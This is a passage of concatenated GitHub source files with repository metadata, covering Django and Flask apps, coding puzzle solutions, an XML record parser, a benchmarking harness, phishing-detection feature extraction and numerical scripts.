static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# error handling\nhandler404 = 'pages.views.not_found'\nhandler500 = 'pages.views.server_error'\nhandler403 = 'pages.views.permission_denied'\nhandler400 = 'pages.views.bad_request'\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Emichira/nightplankenya","sub_path":"night_plan/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32820733485","text":"# standard imports\nimport argparse\nimport os\n\n# external imports\nfrom celery import Celery\nfrom confini import Config\n\n# local imports\nfrom src.cache import initialize_cache\nfrom src.worker.celery_utils import create_celery_app\nfrom tasks import *\n\nlogging.basicConfig(level=logging.WARNING)\nlogg = logging.getLogger()\nlogging.getLogger('gnupg').setLevel(logging.WARNING)\n\nconfig_directory = '/usr/local/etc/cic-ussd/'\n\n# define arguments\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument('-c', type=str, default=config_directory, help='config directory.')\narg_parser.add_argument('-q', type=str, default='cic-ussd', help='queue name for worker tasks')\narg_parser.add_argument('-v', action='store_true', help='be verbose')\narg_parser.add_argument('-vv', action='store_true', help='be more verbose')\narg_parser.add_argument('--env-prefix', default=os.environ.get('CONFINI_ENV_PREFIX'), dest='env_prefix', type=str,\n help='environment prefix for variables to overwrite configuration')\nargs = arg_parser.parse_args()\n\n# define log levels\nif args.vv:\n logging.getLogger().setLevel(logging.DEBUG)\nelif args.v:\n logging.getLogger().setLevel(logging.INFO)\n\n# parse config\nconfig = Config(args.c, args.env_prefix)\nconfig.process()\nconfig.add(args.q, '_CELERY_QUEUE', True)\nconfig.censor('PASSWORD', 'DATABASE')\nlogg.debug('config loaded from {}:\\n{}'.format(args.c, config))\n\ncurrent_app = Celery(__name__)\ncreate_celery_app(config)\n\ninitialize_cache(config)\n\n\ndef main():\n argv = ['worker']\n if args.vv:\n argv.append('--loglevel=DEBUG')\n elif args.v:\n argv.append('--loglevel=INFO')\n argv.extend(('-Q', args.q, '-n', args.q))\n current_app.worker_main(argv)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"grassrootseconomics/cic-text-interface","sub_path":"daemons/tasker.py","file_name":"tasker.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25216471922","text":"# https://leetcode.com/problems/gas-station/\n# tags: #greedy\n#\n# Solution: One pass\n# The main idea is that every time we go to the next station as far as possible (remained gas is bigger or equal to 0)\n# until we can not (remained gas is less than 0).\n# Then we must extend our start station to the \"last station\" (the station before start) to find a possible solution.\n# Repeat these two steps until we have checked all stations (start == end).\n#\n# We can travel around the circuit only if the remained gas is bigger or equal to 0\n# Time complexity: O(n), Space complexity O(1)\nfrom typing import List\n\n\nclass Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n start, tank, total = 0, 0, 0\n\n for station in range(len(gas)):\n fuel = gas[station] - cost[station]\n tank += fuel\n total += fuel\n\n if tank < 0:\n tank = 0\n start = station + 1\n\n return start if total >= 0 else -1\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.canCompleteCircuit(gas=[1, 2, 3, 4, 5], cost=[3, 4, 5, 1, 2])) # 3\n print(sol.canCompleteCircuit(gas=[2, 3, 4], cost=[3, 4, 3])) # -1\n","repo_name":"ronelzb/leetcode","sub_path":"array/0134_gas_station.py","file_name":"0134_gas_station.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69967198121","text":"from collections import deque\n\ndata = open(\"./data.txt\", 'r').read()\n\nwin_size = 14\n\ndeck = deque()\nfor idx, c in enumerate(data):\n deck.append(c)\n if len(deck) == win_size:\n if len(set(deck)) == win_size:\n print(idx+1)\n break\n deck.popleft()\n","repo_name":"LeperGnome/AoC2022","sub_path":"src/tasks/day6/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15934411721","text":"import pyperclip\nimport re\nimport pprint\n\nphoneRegex = re.compile( r'''(\n (\\d{3}|\\(\\d{3}\\))? # Area Code\n (\\s|-|\\.)? # Seperator\n (\\d{3}) # 1st 3 digits\n (\\s|-|\\.) # Seperator\n (\\d{4}) # last 4 digits\n (\\s*(ext|x|ext.)\\s*(\\d{2,5}))?\n)''', re.VERBOSE)\n\nemailRegex = re.compile( r'''(\n [a-zA-Z0-9.-_]+ # Username\n @ # @\n [a-zA-Z0-9.-]+ # Domain name\n \\. # .\n [a-zA-Z]{2,4} # TLD\n)''', re.VERBOSE)\n\nclipboardData = str(pyperclip.paste())\n\nmatches = []\n\nfor groups in phoneRegex.findall(clipboardData):\n phoneNum = '-'.join([groups[1], groups[3], groups[5]])\n if groups[8] != '':\n phoneNum += ' x' + groups[8]\n matches.append(phoneNum)\n\nfor groups in emailRegex.findall(clipboardData):\n matches.append(groups)\n\nif len(matches) > 0:\n pyperclip.copy('\\n'.join(matches))\n print('Copied to clipboard and written to phoneAndEmail.txt')\n f = open(\"phoneAndEmail.txt\", \"w+\")\n f.write(pprint.pformat(matches))\n f.close\nelse:\n print('No phone numbers or email addresses found.')\\","repo_name":"AnandDev006/Python","sub_path":"python/src/phoneAndEmail/phoneAndEmail.py","file_name":"phoneAndEmail.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23386941046","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO, send, emit\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'dev'\nsocketio = SocketIO(app)\n# socketio.init_app(app, cors_allowed_origins=None)\n\n@socketio.on('connect')\ndef connect():\n print('Client connected')\n\n@socketio.on('alert')\ndef handle_message(message):\n print('recceived message: ' + message)\n send(message, broadcast=True)\n\n@socketio.on('disconnect')\ndef disconnect():\n print(\"Client disconnected\")\n\nif __name__ == '__main__':\n socketio.run(app, debug=True)","repo_name":"pi2-fga/201901-SmartWay-Raspberry-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35361712862","text":"from contextlib import contextmanager\r\nfrom math import ceil\r\nimport os\r\nfrom subprocess import Popen\r\nfrom statistics import mean, stdev\r\nimport sys\r\nimport time\r\nfrom typing import List, Tuple, Callable\r\n\r\nfrom common import Problem, load_object, save_object\r\n\r\n\r\nPYTHON_PATH = 'python3.7'\r\nPYPY_PATH = 'pypy'\r\n\r\n\r\n@contextmanager\r\ndef timeit():\r\n class Watch:\r\n def __init__(self, start: float):\r\n self.start: float = start\r\n self.end: float = 0\r\n self.time: float = 0\r\n\r\n watch = Watch(start=time.perf_counter())\r\n try:\r\n yield watch\r\n finally:\r\n watch.end = time.perf_counter()\r\n watch.time = watch.end - watch.start\r\n\r\n\r\nclass Benchmark:\r\n def __init__(self, algorithm_tag: str, problem_tag: str = ''):\r\n self.algorithm_tag: str = algorithm_tag\r\n self.problem_tag: str = problem_tag\r\n self.processing_time: float = 0\r\n\r\n @contextmanager\r\n def run(self, pb: Problem) -> 'Benchmark':\r\n self.problem_tag = pb.name\r\n\r\n print(f\"{self.algorithm_tag}-{self.problem_tag}: start ...\")\r\n self.processing_time = 0\r\n\r\n with timeit() as watch:\r\n yield self\r\n\r\n self.processing_time += watch.time\r\n print(f\"{self.algorithm_tag}-{self.problem_tag}: complete.\")\r\n\r\n self.report()\r\n\r\n def preprocess(self, preprocess: 'Benchmark') -> 'Benchmark':\r\n self.processing_time += preprocess.processing_time\r\n return self\r\n\r\n def report(self) -> 'Benchmark':\r\n print(f'{self.algorithm_tag}-{self.problem_tag}: processing time={self.processing_time}')\r\n return self\r\n\r\n def save(self) -> 'Benchmark':\r\n return save_object(f'benchmark/{self.algorithm_tag}/{self.algorithm_tag}-{self.problem_tag}.bin', self)\r\n\r\n @classmethod\r\n def load(cls, algorithm_tag: str, problem_tag: str) -> 'Benchmark':\r\n return load_object(f'benchmark/{algorithm_tag}/{algorithm_tag}-{problem_tag}.bin')\r\n\r\n\r\ndef run_in_parallel(script_file_path: str, test_function: Callable, use_pypy: bool = False):\r\n if len(sys.argv) == 2:\r\n block_count = int(sys.argv[1])\r\n block_size = ceil(50 / block_count)\r\n for proc in [Popen(f\"{PYPY_PATH if use_pypy else PYTHON_PATH} {os.path.basename(script_file_path)} {i * block_size + 1} {block_size}\", shell=True) for i in range(block_count)]:\r\n proc.wait()\r\n print('complete')\r\n elif len(sys.argv) == 3:\r\n print(\"start -- block=\" + sys.argv[1])\r\n test_function(int(sys.argv[1]), min(int(sys.argv[2]), 51 - int(sys.argv[1])))\r\n print(\"complete -- block=\" + sys.argv[1])\r\n else:\r\n print(\"ERROR: arguments count must be 2 or 3.\")\r\n\r\n\r\ndef load_performance_set(algorithm_name: str, problem_class: str):\r\n performance_set = []\r\n for index in range(0, 50):\r\n bench = Benchmark.load(algorithm_tag=algorithm_name, problem_tag=f\"{problem_class}-{index + 1}\")\r\n performance_set.append((\r\n bench.processing_time,\r\n getattr(bench, 'select_count', 0),\r\n getattr(bench, 'update_count', 0),\r\n getattr(bench, 'children_count', 0),\r\n getattr(bench, 'avg_queue_len', 0),\r\n getattr(bench, 'max_queue_len', 0)))\r\n return performance_set\r\n\r\ndef check_processing_times(algorithm_name: str, problem_class: str):\r\n processing_times = [p[0] for p in load_performance_set(algorithm_name, problem_class)]\r\n return mean(processing_times), stdev(processing_times), max(processing_times), min(processing_times)\r\n\r\n\r\ndef compare_processing_times(improved_algorithm_name: str, base_algorithm_name: str, problem_class: str):\r\n improvements = []\r\n improved_count = 0\r\n for index in range(0, 50):\r\n improved_result = Benchmark.load(algorithm_tag=improved_algorithm_name, problem_tag=f\"{problem_class}-{index + 1}\")\r\n base_result = Benchmark.load(algorithm_tag=base_algorithm_name, problem_tag=f\"{problem_class}-{index + 1}\")\r\n improvements.append(base_result.processing_time / improved_result.processing_time)\r\n improved_count += 1 if improved_result.processing_time < base_result.processing_time else 0\r\n return mean(improvements), stdev(improvements), max(improvements), min(improvements), improved_count, improved_count / len(improvements)\r\n\r\n\r\n","repo_name":"kengo-zenitani/2021-reachability-graph-analysis","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30560035792","text":"from decimal import Decimal\n\nyour_text = input('Type any text:\\n')\n\ndef counting_stars (your_text):\n l = 0\n u = 0\n for i in your_text:\n if i in ['.', ',' ,':' ,';' ,'!', '?', '(', ')', '[', ']', '{', '}', '-', '\"', \"'\", ' ', '@', '#', '$', '%', '^', '&', '*', '№', '~', '`', '-', '_', '+', '=', '<', '>', '|', '\\n', '/']:\n continue\n elif i.islower():\n l += 1\n elif i.isupper():\n u += 1\n s = l + u\n \n x = Decimal((l/s)*100)\n l_percentage = round(x,2)\n\n y = Decimal((u/s)*100)\n u_percentage = round(y,2)\n\n print(f'In the text {u_percentage} % of letters are in upper case and {l_percentage} % of letters are in lower case.')\n\ncounting_stars (your_text)\n","repo_name":"Argen-Aman/chapter3task5","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29219272540","text":"from lxml import etree\nimport sys\nfrom pprint import pprint\nfrom collections.abc import MutableMapping\nimport csv\n\nclass record(dict):\n def __repr__(self):\n return super(record, self).__repr__()\n\n @classmethod\n def parse_tuple(cls, tuple_elem):\n \"Parse out a record within an EMu xml report to JSON\"\n new_rec = cls()\n new_rec.xml = tuple_elem\n for elem in tuple_elem:\n if elem.tag == 'atom':\n new_rec[elem.attrib['name']] = elem.text\n elif elem.tag == 'tuple':\n new_rec[elem.attrib['name']] = cls.parse_tuple(elem)\n elif elem.tag == 'table':\n new_rec[elem.attrib['name']] = []\n for record in elem.iterfind('tuple'):\n new_rec[elem.attrib['name']].append(cls.parse_tuple(record))\n return new_rec\n\n @classmethod\n def parse_xml(cls, xml_doc):\n \"iterator to generate JSON EMu records from xml\"\n with open(xml_doc, encoding='utf-8') as f:\n text = f.read()\n for x in range(8):\n text = text.replace(chr(x), ' ')\n text = text.replace(chr(19), '')\n text = text.replace(chr(20), '')\n text = text.replace(chr(24), '')\n text = text.replace(chr(25), '')\n text = text.replace(chr(28), '')\n text = text.replace(chr(29), '')\n text = text.replace('\\u2014', '-')\n text = text.replace('\\u2013', '-')\n text = text.replace('encoding=\"UTF-8\"', '')\n tree = etree.fromstring(text)\n for elem in tree.iterfind('tuple'):\n yield cls.parse_tuple(elem)\n\n def merge_field(self, **kwargs):\n \"\"\"merge a given field based on kwargs - table fields are appended as\n new levels, text fields are added as new lines\"\"\"\n for key, val in kwargs.items():\n if key.endswith('_tab'):\n if self.get(key) is not None:\n self[key].append(val)\n else:\n self[key] = [val]\n else:\n self[key] += '\\n' + val\n\n def migrate_field(self, source, dest):\n \"Migrate a field to another field, blanking the source field\"\n val = self[source]\n if dest.endswith('_tab'):\n self[dest] = [val]\n else:\n self[dest] = val\n self[source] = None\n\n def to_xml(self):\n \"Export a record as EMu xml\"\n root_element = etree.Element('tuple')\n for key, value in self.items():\n if type(value) == str:\n etree.SubElement(root_element, 'atom', name=key).text = value\n elif type(value) == list:\n tab_element = etree.SubElement(root_element, 'table', name=key)\n for val in value:\n if hasattr(val, 'to_xml'):\n tab_element.append(val.to_xml())\n else:\n tup_element = etree.SubElement(tab_element, 'tuple')\n field, _ = key.split('_')\n etree.SubElement(tup_element, 'atom', name=field).text = val\n elif hasattr(value, 'to_xml'):\n tup_element = value.to_xml()\n tup_element.attrib['name'] = key\n root_element.append(tup_element)\n return root_element\n\n def flatten(self, parent_key='', sep='.'):\n \"Flatten the record JSON structure to a format suitable for CSV output\"\n items = []\n for k, v in self.items():\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(v, MutableMapping):\n items.extend(v.flatten(new_key, sep=sep).items())\n elif isinstance(v, list):\n for x in v:\n items.extend(x.flatten(new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n row = {}\n for field, value in items:\n if value is None:\n value = ''\n if not row.get(field):\n row[field] = value\n else:\n row[field] += '|' + value\n return row\n \n def findall(self, fieldname):\n \"return all text values for a given fielldname, including in nested records\"\n xpath = f\".//atom[@name='{fieldname}']\"\n for x in self.xml.findall(xpath):\n if x.text is not None:\n yield x.text\n \n def find(self, fieldname):\n \"return the first value for a given fieldname, including in nested records\"\n xpath = f\".//atom[@name='{fieldname}']\"\n x = self.xml.find(xpath)\n if x is not None:\n return x.text\n\n def find_in_table(self, table_name, fieldnames):\n \"return the first value for a given fieldname, including in nested records\"\n xpath = f\".//table[@name='{table_name}']/tuple\"\n for x in self.xml.findall(xpath):\n data = {}\n for f in fieldnames:\n xpath = f\"atom[@name='{f}']\"\n e = x.find(xpath)\n if e is not None:\n data[f] = e.text\n else:\n data[f] = None\n yield data\n\n\n def find_in_tuple(self, tuple_name, fieldnames): \n \"return the first value for a given fieldname, including in nested records\"\n xpath = f\".//tuple[@name='{tuple_name}']\"\n for x in self.xml.findall(xpath):\n data = {}\n for f in fieldnames:\n xpath = f\"atom[@name='{f}']\"\n e = x.find(xpath)\n if e is not None:\n data[f] = e.text\n else:\n data[f] = None\n yield data\n\n def print_xml(self):\n return etree.tostring(self.to_xml(), pretty_print=True).decode()\n\n @staticmethod\n def serialise_to_xml(table, records, out_file):\n table_elem = etree.Element('table', name=table)\n for rec in records:\n table_elem.append(rec.to_xml())\n tree = etree.ElementTree(table_elem)\n tree.write(\n str(out_file), pretty_print=True, standalone=True, xml_declaration=True,\n encoding='UTF-8')\n\n @classmethod\n def serialise_to_csv(cls, in_file, out_file):\n fieldnames = set()\n rows = []\n for r in cls.parse_xml(in_file):\n row = r.flatten()\n fieldnames.update(row.keys())\n rows.append(row)\n fieldnames = list(fieldnames)\n fieldnames.sort()\n with open(out_file, 'w', encoding='utf-8-sig', newline='') as f:\n writer= csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(rows)\n\nif __name__ == '__main__':\n record.serialise_to_csv(sys.argv[1], sys.argv[2])\n","repo_name":"lglanville/rms","sub_path":"emu_xml_parser.py","file_name":"emu_xml_parser.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18240626821","text":"from django.shortcuts import render\nfrom django.http.response import JsonResponse, HttpResponse, FileResponse\nfrom django.views import View\nfrom django.core import serializers\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nimport json\nfrom .models import Category, SpecialistModel\nfrom django.db.models import Q\nimport random\nfrom .resources import SpecialistResource\nfrom datetime import datetime\nimport xlrd\nfrom django.forms.models import model_to_dict\nfrom .admin import refreshAge\n\n\n# Create your views here.\n\n\nclass RandomSelectView(View):\n def get(self, requests):\n cq = Category.objects.all()\n categories = []\n for c in cq:\n categories.append(c.ctg_code + \" \" + c.ctg_name)\n\n dic = json.dumps({\"categories\": categories})\n return render(requests, \"admin/randomselect.html\", {\"dic\": dic})\n\n def post(self, requests):\n try:\n data = json.loads(requests.body)\n querysetAll = SpecialistModel.objects.only('id')\n querysetIdList = []\n for q in querysetAll:\n querysetIdList.append(q.id)\n forms = data['data']\n slice = []\n results = []\n for form in forms:\n queryset = SpecialistModel.objects.filter(id__in=querysetIdList)\n realSize = form['size'] * 3\n category = form['selectedValue'].split(\" \")[0]\n company = form['company']\n current_query = queryset.filter(Q(spe_ctg1__ctg_code=category) | Q(spe_ctg2__ctg_code=category) | Q(\n spe_major__ctg_code=category)).exclude(\n spe_company=company)\n current_query = current_query.distinct()\n formResult = []\n deleteID = []\n if realSize < current_query.count():\n randList = random.sample(range(current_query.count()), realSize)\n else:\n randList = range(current_query.count())\n for i in randList:\n deleteID.append(current_query[i].id)\n dict = model_to_dict(current_query[i])\n major = Category.objects.get(id=dict['spe_major'])\n ctg1 = Category.objects.get(id=dict['spe_ctg1'])\n ctg2 = Category.objects.get(id=dict['spe_ctg2'])\n dict['spe_major'] = model_to_dict(major)\n dict['spe_ctg1'] = model_to_dict(ctg1)\n dict['spe_ctg2'] = model_to_dict(ctg2)\n dict['spe_birth'] = dict['spe_birth'].strftime(\"%Y-%m-%d\")\n formResult.append(dict)\n querysetIdList.remove(current_query[i].id)\n results.append(formResult)\n # print(results)\n return JsonResponse(results, safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\n\nclass PrintView(View):\n CONTENT_TYPE = 'application/octet-stream'\n def get_export_filename(self):\n date_str = datetime.now().strftime('%Y-%m-%d')\n filename = \"%s-%s.%s\" % (\"list\",\n date_str,\n 'xls')\n return filename\n\n def post(self, requests):\n try:\n data = json.loads(requests.body)\n pks = data['pks']\n # __in 修饰符表包含关系\n qs = SpecialistModel.objects.filter(id__in=pks)\n dataset = SpecialistResource().export(queryset=qs)\n res = HttpResponse(\n dataset.xls, content_type=\"application/vnd.ms-excel\"\n )\n res['Content-Disposition'] = 'attachment; filename=\"test.xls\"'\n return res\n except Exception as e:\n return HttpResponse(e)\n\n\nclass UploadView(View):\n\n @method_decorator(csrf_exempt) # CSRF Token相关装饰器在CBV只能加到dispatch方法上\n def dispatch(self, request, *args, **kwargs):\n return super(UploadView, self).dispatch(request, *args, **kwargs)\n\n def get(self, requests):\n cq = Category.objects.all()\n categories = []\n for c in cq:\n categories.append(c.ctg_code + \" \" + c.ctg_name)\n\n dic = json.dumps({\"categories\": categories})\n return render(requests, \"admin/importfromxls.html\", {\"dic\": dic})\n\n def post(self, requests):\n try:\n file = requests.FILES.get(\"file\", None)\n category = requests.POST.get(\"selectedValue\").split(\" \")[1]\n company = requests.POST.get(\"company\")\n queryset = SpecialistModel.objects.filter(\n Q(spe_ctg1__ctg_name=category) | Q(spe_ctg2__ctg_name=category)\n ).exclude(spe_company=company)\n xlsdata = xlrd.open_workbook(file_contents=file.read())\n table = xlsdata.sheet_by_index(0)\n temp = table.col_slice(colx=1, start_rowx=1)\n randomList = []\n for row in temp:\n randomList.append(int(row.value))\n size = len(randomList)\n qs = queryset.filter(spe_code__in=randomList)\n qs.distinct()\n realSize = len(qs)\n if realSize < size:\n benchqs = queryset.exclude(spe_code__in=randomList)[0:size - realSize]\n qs = qs | benchqs\n data = eval(serializers.serialize(\"json\", qs, use_natural_foreign_keys=True))\n return JsonResponse(data, safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\ndef statisticAgeSpan(queryset):\n ageSpan = {\n \"<21\": 0,\n \"21-30\": 0,\n \"31-40\": 0,\n \"41-50\": 0,\n \"51-60\": 0,\n \">60\": 0,\n }\n result = []\n for q in queryset:\n age = int(q.spe_age)\n if age in range(1, 20):\n ageSpan[\"<21\"] += 1\n elif age in range(21, 30):\n ageSpan[\"21-30\"] += 1\n elif age in range(31, 40):\n ageSpan[\"31-40\"] += 1\n elif age in range(41, 50):\n ageSpan[\"41-50\"] += 1\n elif age in range(51, 60):\n ageSpan[\"51-60\"] += 1\n elif age in range(61,100):\n ageSpan[\">60\"] += 1\n for key in ageSpan:\n result.append({\n \"name\": key,\n \"value\": ageSpan[key]\n })\n return result\n\n\nclass StatisticView(View):\n\n def get(self, requests):\n cq = Category.objects.all()\n categories = []\n for c in cq:\n categories.append(c.ctg_code + \" \" + c.ctg_name)\n ageSpan = statisticAgeSpan(SpecialistModel.objects.all())\n\n dic = json.dumps({\"categories\": categories, \"ageSpan\": ageSpan})\n return render(requests, \"admin/statistic.html\", {\"dic\": dic})\n\n\nclass StatisticCategoryView(View):\n def get(self, requests, category):\n try:\n categories = category.split('-')\n\n major = categories[0]\n ctg1 = categories[1]\n ctg2 = categories[2]\n if major:\n major = major.split(' ')[0]\n if ctg1:\n ctg1 = ctg1.split(' ')[0]\n if ctg2:\n ctg2 = ctg2.split(' ')[0]\n print(ctg1)\n qs = SpecialistModel.objects.filter(\n Q(spe_major__ctg_code=major) | Q(spe_ctg1__ctg_code=ctg1) | Q(spe_ctg2__ctg_code=ctg2))\n print(qs)\n return JsonResponse(json.dumps(statisticAgeSpan(qs)), safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\nclass CheckView(View):\n def get(self, requests):\n try:\n retired = []\n qs = SpecialistModel.objects.filter(spe_age__gte=60)\n for q in qs:\n retired.append({\n \"name\": q.spe_name,\n \"id\": q.id,\n })\n return JsonResponse(json.dumps(retired), safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n def post(self, requests):\n try:\n data = json.loads(requests.body)\n pks = data['data']\n qs = SpecialistModel.objects.filter(id__in=pks).delete()\n return JsonResponse(json.dumps({\"\": \"\"}), safe=False)\n except Exception as e:\n return HttpResponse(e)\n\n\nclass refreshAgeView(View):\n def get(self, requests):\n try:\n refreshAge()\n return JsonResponse(json.dumps({\"\": \"\"}), safe=False)\n except Exception as e:\n return HttpResponse(e)\n","repo_name":"Mid0Riii/specialistProject","sub_path":"specialistApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29674646671","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom concurrent.futures import ThreadPoolExecutor\nimport pickle\nimport pandas as pd\n\n# function to cache downloaded web pages\ndef cache_web_page(url, cache_dir='cache'):\n os.makedirs(cache_dir, exist_ok=True)\n cache_file = os.path.join(cache_dir, f\"{hash(url)}.pickle\")\n\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as f:\n return pickle.load(f)\n else:\n try:\n response = requests.get(url, timeout=10)\n with open(cache_file, 'wb') as f:\n pickle.dump(response, f)\n except requests.exceptions.RequestException:\n response = None\n\n return response\n\n\ndef extract_title_and_meta_description(url):\n try:\n response = cache_web_page(url)\n if response is None or not response.content:\n return '', ''\n\n decoded_content = response.content.decode(errors='replace')\n if not decoded_content.strip().startswith('<'):\n return '', ''\n\n soup = BeautifulSoup(decoded_content, 'lxml')\n title = soup.title.string.strip() if soup.title else ''\n meta_description = ''\n for tag in soup.find_all('meta'):\n if 'name' in tag.attrs and tag.attrs['name'].lower() == 'description':\n meta_description = tag.attrs['content']\n break\n return title, meta_description\n except:\n return '', ''\n\n\n# Add batch_size parameter to the parallel extraction function\ndef extract_titles_and_meta_descriptions_parallel(urls, max_workers=10, batch_size=1000):\n results = []\n for i in range(0, len(urls), batch_size):\n batch_urls = urls[i:i + batch_size]\n print(f\"Processing batch {i // batch_size + 1} of {len(urls) // batch_size + 1}\")\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n batch_results = list(executor.map(extract_title_and_meta_description, batch_urls))\n results.extend(batch_results)\n return results\n\ndef extract_nlp_features(urls, max_features=100, max_workers=10, batch_size=1000):\n print(\"Extracting titles and meta descriptions...\")\n titles_and_meta_descriptions = extract_titles_and_meta_descriptions_parallel(urls, max_workers=max_workers, batch_size=batch_size)\n\n print(\"Combining texts...\")\n combined_texts = [\n f\"{title} {meta_description}\"\n for title, meta_description in titles_and_meta_descriptions\n ]\n\n print(\"Vectorizing texts...\")\n vectorizer = TfidfVectorizer(max_features=max_features)\n nlp_features = vectorizer.fit_transform(combined_texts)\n\n # Convert the csr_matrix to a DataFrame\n print(\"Converting to DataFrame...\")\n nlp_features_df = pd.DataFrame(nlp_features.toarray(), columns=vectorizer.get_feature_names_out())\n\n return nlp_features_df","repo_name":"maheenfs/Phishing-Detection-Using-NLP-and-Graph-Features-Extraction","sub_path":"nlp_features.py","file_name":"nlp_features.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22174649510","text":"import os\nos.environ['XLA_PYTHON_CLIENT_PREALLOCATE'] ='false'\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n\nimport tensorflow_datasets as tfds\nfrom tqdm import tqdm\nimport pickle\n\ndataset_builder = tfds.builder('imagenet2012')\ndataset_builder.download_and_prepare(download_config=tfds.download.DownloadConfig(\n manual_dir='/user/home/qe22442/work/ImageNet'))\n\n\nfrom input_pipeline import preprocess_for_eval, create_split\n\nds = create_split(dataset_builder, 1000, True)\nimg = next(iter(tfds.as_numpy(ds)))['image'][:20]\n\n\nimport haiku as hk\nimport jax\nimport jax.numpy as jnp\nfrom PIL import Image\n\nimport haikumodels as hm\n\nrng = jax.random.PRNGKey(42)\n\ndef _model(images, is_training, sm_mode):\n net = hm.SmResNet50()\n return net(images, is_training, sm_mode)\n\nmodel = hk.transform_with_state(_model)\nparams, state = model.init(rng, img, is_training=True, sm_mode=None)\n\ncorrect = 0\ntotal = 0\nfor t in tqdm(tfds.as_numpy(ds)):\n X = t['image']\n y = t['label']\n X = hm.resnet.preprocess_input(X)\n # print(X.shape)\n preds, state = model.apply(params, state, None, X, is_training=True, sm_mode='acc')\n total += len(X)\n correct += (preds.argmax(-1) == y).sum()\n\nwith open(os.path.join('./cov_cache', f\"bn_sm.pkl\"), \"wb\") as f:\n pickle.dump(state, f)\n\nprint(total)\nprint(correct / total)\n","repo_name":"xidulu/ShiftMatchImageNet","sub_path":"cov_train_generator.py","file_name":"cov_train_generator.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73925260520","text":"import numpy as np\nimport sympy as sp\n\n# Define x and y as mathematical symbols\nvars = sp.symbols('x y')\nx, y = vars\n\n# Define the functions \nf = ([x*y - y**3 - 1, x**2 * y + y - 5])\n\n# Initialise Jacobian matrix\nJ = sp.zeros(len(f),len(vars))\n\n# Fill Jacobian matrix with entries\nfor i, fi in enumerate(f):\n for j, symbol in enumerate(vars):\n J[i,j] = sp.diff(fi, symbol)\n\nprint(J)\n# Find the inverse of Jacobian Matrix\nJ_inv = sp.Matrix.inv(J)\n\nprint(J_inv)\n# Initialize solution s with starting value x_0 = 2.0 and y_0 = 3.0\ns = sp.Matrix([\n 0.0,\n 5.0\n])\n\ni = 0\nwhile i<10:\n\n # Update f(s_k) using newer values of s_k\n f_sk = sp.Matrix([f[0].subs({x:s[0],y:s[1]}),f[1].subs({x:s[0],y:s[1]})])\n\n\n # Calculate value of inverse jacobian, j^-1(sk), j_val\n j_val = J_inv.subs({x:s[0],y:s[1]})\n\n print(s) \n \n # Calculate the new value of s using iterative formula\n s = s-j_val*f_sk;\n\n \n i += 1\n\nprint()","repo_name":"Arc-tic-Wolf/Numerical-Scripts","sub_path":"jacob.py","file_name":"jacob.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8048579976","text":"from typing import Optional\nfrom uuid import UUID\n\nimport aiohttp\nimport sqlalchemy.sql as sa\nfrom sqlalchemy.engine import RowMapping\n\nfrom vocabulary.common import database, settings\nfrom vocabulary.common.log import logger\nfrom vocabulary.models import models\n\n\nasync def _get_json(url: str):\n async with aiohttp.ClientSession() as ses:\n async with ses.get(url) as resp:\n try:\n json = await resp.json()\n except Exception as e:\n logger.exception(e)\n return {}\n return json\n\n\nasync def get_linked_words(word: str) 